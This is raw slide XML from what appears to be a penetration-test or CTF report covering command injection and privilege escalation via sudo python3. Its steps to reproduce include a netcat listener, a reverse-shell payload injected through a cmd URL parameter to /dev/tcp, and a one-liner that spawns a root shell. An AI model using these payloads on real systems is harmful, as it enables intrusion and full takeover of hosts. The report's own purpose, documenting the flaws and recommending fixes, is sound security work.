              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6023113" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>SSH into the machine:                                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>ssh jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Forward internal port:                                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Start listener: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Visit in browser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd= bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We gained a reverse shell, giving them persistent, interactive control over the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabled command execution, data theft, system manipulation, and escalation to root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Represents a critical threat, especially in environments without outbound traffic monitoring or internal segmentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6DA77A-C7E6-EB70-530C-3B286531307A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717502" y="1686019"/>
            <a:ext cx="4795614" cy="2970064"/>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157584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0540B-C8A4-6F82-74DD-943DA7DDC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9F944-4E2D-9644-B5CF-EF644D753B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B314266-A9AF-0B3D-66C5-0EA8CB0BE87F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="281781" y="805071"/>
            <a:ext cx="11628437" cy="2303072"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960237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A89B7-E2EA-F9F1-C15C-D7B7C1BEE7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2F529-7656-99EB-A334-355178F2B76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Privilege Escalation via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> python3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28263622-188B-1C6B-E7F0-D8E855C1778A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Privilege Escalation via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We leveraged the ability to run python3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> privileges to escalate access from a limited user to root. By executing a Python command that spawns a bash shell, full administrative control over the system was achieved, bypassing proper privilege boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Not web-based. Exploited via terminal after SSH access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> This vulnerability allowed a local user to escalate privileges to root without authentication or exploiting any kernel or memory flaws, using a whitelisted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> command — a common misconfiguration with high impact.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full root access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass of user privilege restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete compromise of system integrity and confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to disable security controls, modify logs, or implant persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Restrict or audit commands allowed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sudoers</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Avoid giving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> rights to interpreters like Python, Perl, or Bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Use least-privilege principles and role-based access control (RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> usage and configure alerting for unusual privilege escalations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2299123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058D-A469-48AA-085D-9B418EEA4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327139-2CA8-55D1-363E-558F2EF37CFE}"/>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DAF28966-E8CF-D16C-0DA8-A4EEA9032453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Score: 7.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Run the following command on the compromised user shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>    script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Result:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> Root shell (#) is granted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Attacker obtained user-level access (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>jehad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>) via SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Explored system and verified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Identified permission to run python3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> without a password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Executed a Python one-liner to spawn a root shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Gained full control of the machine and captured the flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058981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93AD0-7195-5D19-DCD0-EE0682298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0E063-E359-22C4-B6E5-1317971255C1}"/>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A6D467D2-4950-28B1-05A4-6D45FA22B18F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6430618" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SSH into the system using valid credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>–S -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to view allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Execute the payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Confirm root access is achieved (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Escalated from limited user to full root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ability to modify system files, disable security services, and create backdoors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>High risk of persistent compromise, data tampering, and stealthy control over the host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5171AC5D-EFD4-489E-1131-CE6C69178ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
